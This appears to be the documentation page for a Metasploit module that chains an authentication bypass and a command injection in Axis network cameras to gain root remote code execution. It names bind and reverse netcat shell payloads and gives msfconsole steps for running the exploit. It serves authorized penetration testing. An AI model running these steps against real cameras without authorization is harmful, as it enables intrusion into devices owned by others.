960 B
960 B
This module exploits multiple vulnerabilities against Axis Network Cameras, including an authentication bypass in the .srv functionality, as well as a command injection in "parhand", in order to gain arbitrary remote code execution under the context of root.
The exploit currently only supports the following payloads:
- cmd/unix/bind_netcat_gaping
- cmd/unix/reverse_netcat_gaping
Vulnerable Application
The particular firmware (Companion Dome V) tested for this exploit was 6.15.4, web version 16.05.02.
For a list of affected Axis products, please go to the following page: https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf
Verification Steps
- Start msfconsole
- Do:
exploit/linux/http/axis_srv_parhand_rce - Do:
set rhosts [IP] - Do:
show payloadsto select a payload (that is not ipv6) - Do:
set payload [name of payload] - Set LHOST if you are using a reverse shell
- Do:
run - You should get a session